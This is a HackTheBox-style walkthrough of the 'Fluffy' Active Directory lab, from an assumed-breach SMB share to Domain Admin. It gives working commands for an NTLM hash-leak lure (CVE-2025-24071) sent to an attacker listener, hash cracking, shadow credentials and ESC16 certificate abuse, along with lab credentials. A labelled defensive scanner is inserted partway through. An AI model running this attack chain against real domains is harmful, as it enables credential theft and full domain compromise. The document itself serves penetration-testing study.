HTB - Fluffy

Description


This machine follows an assumed breach scenario, starting with a user who has Read/Write access to an SMB share. Leveraging a recent Windows vulnerability, the attacker uploads a crafted .zip file containing a .library-ms file pointing to a malicious address. When any user extracts the archive, the system initiates an NTLMv2 authentication attempt to the attacker-controlled listener. Capturing the hash via smbserver or responder, the attacker cracks it to obtain credentials for another domain user. This user has GenericAll over a group, and the group has GenericWrite over three domain users, allowing takeover through a shadow credentials attack. One compromised user has WinRM access to the target system, and another is a member of the Cert Publishers group. By enumerating certificate templates, the attacker identifies and exploits an ESC16 misconfiguration to escalate privileges and obtain Domain Admin access.

Enumeration


As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account: j.fleischman / J0elTHEM4n1990!

Nmap Scan

I will start with a normal Nmap scan, but first I export the machine IP, username, password and domain as variables for easy reuse.

export target=10.10.11.69 ; export user=j.fleischman; export password='J0elTHEM4n1990!'; export domain=fluffy.htb

Nmap Scan

mkdir Nmap; nmap -p- --min-rate 10000 $target -Pn -oN Nmap/allports

PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49689/tcp open  unknown
49690/tcp open  unknown
49693/tcp open  unknown
49709/tcp open  unknown
49716/tcp open  unknown

Then put the open ports into a ports variable and run the Nmap script and version scan.

export ports="$(grep '^[0-9]' Nmap/allports | cut -d/ -f1 | tr '\n' ',' | sed 's/,$//')"

nmap -p"$ports" $target -Pn -sC -sV -oN Nmap/script-scan

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-10 17:11:16Z)
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-07-10T17:12:48+00:00; +6h59m58s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
|_ssl-date: 2025-07-10T17:12:48+00:00; +6h59m58s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-07-10T17:12:48+00:00; +6h59m58s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-07-10T17:12:48+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing

Summary

* Open ports: 53,88,139,389,445,464,593,636,3268,3269,5985,9389
* Services: DNS, Kerberos, LDAP, LDAPS, SMB, RPC, WinRM
* Important notes: Domain: fluffy.htb - DNS:DC01.fluffy.htb

I always update /etc/hosts before I attack the domain to avoid any tooling issues.

echo "$target dc01 dc01.fluffy.htb fluffy.htb" | sudo tee -a /etc/hosts
10.10.11.69 dc01 dc01.fluffy.htb fluffy.htb

I started by enumerating SMB, looking for accessible shares, and found that I had READ/WRITE permission on the IT share.

nxc smb $target -u $user -p $password --shares

I connected to the share and noticed something odd: there are archive files, and their extracted contents sit alongside them in the same directory, which suggests someone on the other side extracts whatever is uploaded there.

impacket-smbclient "$domain/$user:$password"@"$target"

There was also a .pdf file, which I downloaded and opened locally:

The PDF stated that several vulnerabilities affect the Windows system and require urgent patching.

The same PDF contains a table listing each CVE ID and its severity.

Foothold


CVE-2025-24071 is a recent Windows vulnerability that leaks NTLM hashes when a crafted archive is extracted in a Windows environment.

Windows Explorer automatically initiates an SMB authentication request when a .library-ms file is extracted from a .rar archive, leading to NTLM hash disclosure. The user does not need to open or execute the file; simply extracting it is enough to trigger the leak.
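As an added defensive example (not part of the original write-up or the linked PoC), this Python scanner flags .library-ms entries inside an archive whose location points at a remote host, the lure pattern behind CVE-2025-24071. The sample archive and its hostname are constructed placeholders.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Namespace of Windows library description files (.library-ms).
LIB_NS = "{http://schemas.microsoft.com/windows/2009/library}"
# UNC paths and any scheme-prefixed URL are treated as remote references.
REMOTE_RE = re.compile(r"^(\\\\|//|[a-z][a-z0-9+.-]*://)", re.IGNORECASE)

def remote_library_urls(xml_bytes):
    """Return <url> values in a .library-ms document that reference a remote location."""
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError:
        return []  # not a parseable library description, nothing to flag
    return [u.text.strip() for u in root.iter(LIB_NS + "url")
            if u.text and REMOTE_RE.match(u.text.strip())]

def scan_archive(zip_bytes):
    """Map each .library-ms entry with a remote location to the URLs it points at."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if name.lower().endswith(".library-ms"):
                urls = remote_library_urls(zf.read(name))
                if urls:
                    findings[name] = urls
    return findings

# Constructed sample archive: one library pointing at a placeholder UNC host
# (the lure shape described in the write-up) next to a benign local library.
LURE_XML = r"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList><searchConnectorDescription>
    <simpleLocation><url>\\ATTACKER_PLACEHOLDER\share</url></simpleLocation>
  </searchConnectorDescription></searchConnectorDescriptionList>
</libraryDescription>"""
LOCAL_XML = LURE_XML.replace(r"\\ATTACKER_PLACEHOLDER\share", r"C:\Users\Public\Documents")

def build_sample_archive():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/report.library-ms", LURE_XML)
        zf.writestr("docs/local.library-ms", LOCAL_XML)
        zf.writestr("docs/readme.txt", "harmless text file")
    return buf.getvalue()
```

Running scan_archive over uploads to a writable share (or a mail gateway's attachments) gives a cheap pre-extraction check; the local library is left unflagged because only UNC and URL-scheme locations count as remote.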

I cloned the repo, ran the exploit, and uploaded the exploit file (.zip).

git clone https://github.com/0x6rss/CVE-2025-24071_PoC.git

➜  CVE-2025-24071_PoC git:(main) python poc.py 

Enter your file name: exploit.zip
Enter IP (EX: 192.168.1.162): 10.10.16.14
completed

ls    
exploit.zip  poc.py  README.md

In another terminal, I started smbserver to receive the NTLMv2 authentication.

impacket-smbserver -smb2support shared $(pwd)

I saved the captured hash to ntlmv2.hash, and it was cracked successfully.

hashcat -m 5600 ntlmv2.hash /usr/share/wordlists/rockyou.txt

..snip..
P.AGILA::FLUFFY:aaaaaaaaaaaaaaaa:f29a0e18c93061c0af46ef5bb70b63e5:010100000000000000dd6793ebccdb013c7a2d2bd065bee600000000010010006c004f00620071004b00700056005100030010006c004f00620071004b00700056005100020010004a0061006300470061004b0050006800040010004a0061006300470061004b00500068000700080000dd6793ebccdb0106000400020000000800300030000000000000000100000000200000cbc3277eb791f42542be92295c13824afb1ef0001e7901d4f727bc0b8bbb43b60a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e003100360xxxxxxxxxxxxxxxxxxxxxxxxxxxxx:REDACTED

Session..........: hashcat
Status...........: Cracked

With p.agila's credentials (or j.fleischman's), I could collect LDAP data with bloodhound.py.

bloodhound-python -u $user -p $password -ns $target -d $domain -c all --dns-timeout 120 --zip

Lateral movement


  • BloodHound showed the escalation path from p.agila to 3 domain users:

    1. ca_svc is a member of Cert Publishers

    2. ldap_svc

    3. winrm_svc can winRM to the box

  • With GenericAll over the Service Accounts group, I can add any user to it and inherit the group's privileges

  • With GenericWrite, I could perform the following attacks:

    1. targetedKerberoast (assign an SPN to the user and obtain a hash to crack offline)

    2. Shadow Credential (Add Key Credentials for a user)

I prefer the Shadow Credentials attack because it is the better choice from an OPSEC standpoint.

Add myself to the Service Accounts group

bloodyAD --host 10.10.11.69 -d fluffy.htb -u p.agila -p REDACTED add groupMember 'Service Accounts' p.agila
[+] p.agila added to Service Accounts

Add shadow cred for winrm_svc

certipy shadow auto -u p.agila@fluffy.htb -p REDACTED -account winrm_svc
evil-winrm -i fluffy.htb -u winrm_svc -H 33bd09dcd697600edfxxxxxxxxxxx

User flag: 2eb60ea1cc7b27axxxxxxxxxxxxxxx

Privilege Escalation


There was another account in the Cert Publishers group, and BloodHound described its privileges.

First, I looked for ADCS in the domain with nxc and found one CA named fluffy-DC01-CA

nxc ldap fluffy.htb -u p.agila -p 'REDACTED' -M adcs
LDAP        10.10.11.69     389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb)
LDAP        10.10.11.69     389    DC01             [+] fluffy.htb\p.agila:######## 
ADCS        10.10.11.69     389    DC01             [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS        10.10.11.69     389    DC01             Found PKI Enrollment Server: DC01.fluffy.htb
ADCS        10.10.11.69     389    DC01             Found CN: fluffy-DC01-CA

Second, I added a key credential to ca_svc and obtained its NT hash

certipy shadow auto -u p.agila@fluffy.htb -p REDACTED -account ca_svc

Then I used the latest version of Certipy to find templates vulnerable to ESC attacks

certipy find -u ca_svc@fluffy.htb -hashes REDACTED -enable -stdout -vulnerable

ESC16 describes a misconfiguration where the CA itself is globally configured to disable the inclusion of the szOID_NTDS_CA_SECURITY_EXT (OID 1.3.6.1.4.1.311.25.2) security extension in all certificates it issues. This SID extension, introduced with the May 2022 security updates (KB5014754), is vital for "strong certificate mapping", enabling DCs to reliably map a certificate to a user or computer account's SID for authentication.

I followed the ESC16 procedure from the Certipy wiki, which matches my situation here:

  1. Change the victim account's UPN to match a target privileged account's sAMAccountName.

certipy account -u ca_svc -hashes REDACTED -dc-ip 10.10.11.69 -upn 'administrator' -user 'ca_svc' update

Then request a Kerberos ticket and authenticate with it instead of NTLM, so the updated UPN is carried in the ticket information:

impacket-getTGT fluffy.htb/ca_svc -hashes REDACTED -dc-ip 10.10.11.69
export KRB5CCNAME=`pwd`/ca_svc.ccache

  2. Request a certificate (which will automatically lack the SID security extension due to the CA's ESC16 configuration).

certipy req -k -dc-ip 10.10.11.69 -target dc01.fluffy.htb -ca 'fluffy-DC01-CA' -template 'User'

  3. Revert the UPN change.

certipy account -u ca_svc -hashes REDACTED -dc-ip 10.10.11.69 -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update

  4. Use the certificate to impersonate the target.

certipy auth -dc-ip 10.10.11.69 -pfx 'administrator.pfx' -username 'administrator' -domain fluffy.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

Get the root flag

nxc smb fluffy.htb -u Administrator -H REDACTED -x 'type C:\Users\Administrator\Desktop\root.txt'
